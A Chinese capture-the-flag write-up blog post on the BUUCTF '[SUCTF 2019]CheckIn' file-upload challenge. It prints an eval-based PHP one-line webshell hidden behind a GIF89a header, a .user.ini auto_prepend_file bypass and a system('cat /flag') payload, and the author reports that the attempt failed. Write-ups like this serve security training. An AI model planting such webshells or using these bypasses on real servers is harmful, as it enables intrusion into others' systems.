106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
艾小码13 小时前
前端安全防护手册:对抗XSS、CSRF、点击劫持等攻击
前端·安全·xss
Bruce_Liuxiaowei7 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
爱敲代码的小旗12 天前
Vue 项目安全设置方案:XSS/CSRF 防护指南
vue.js·安全·xss
云博客-资源宝12 天前
php防注入和XSS过滤参考代码
开发语言·php·xss
全宝13 天前
🛡️ Vue项目XSS攻击防护指南:从漏洞发现到js-xss完美解决
前端·javascript·xss
16年上任的CTO15 天前
常见网络攻击类型及防护手段
网络攻击模型·ddos·xss·sql注入·网络防护·xsrf·arf
fatsheep洋18 天前
XSS的原型链污染1--原型链解释
前端·xss
样子201819 天前
PHP 之使用HTMLPurifier过滤XSS
开发语言·前端·php·xss
fatsheep洋22 天前
XSS-DOM-1
java·前端·xss
Status_50022 天前
XSS跨站脚本攻击详解
web安全·xss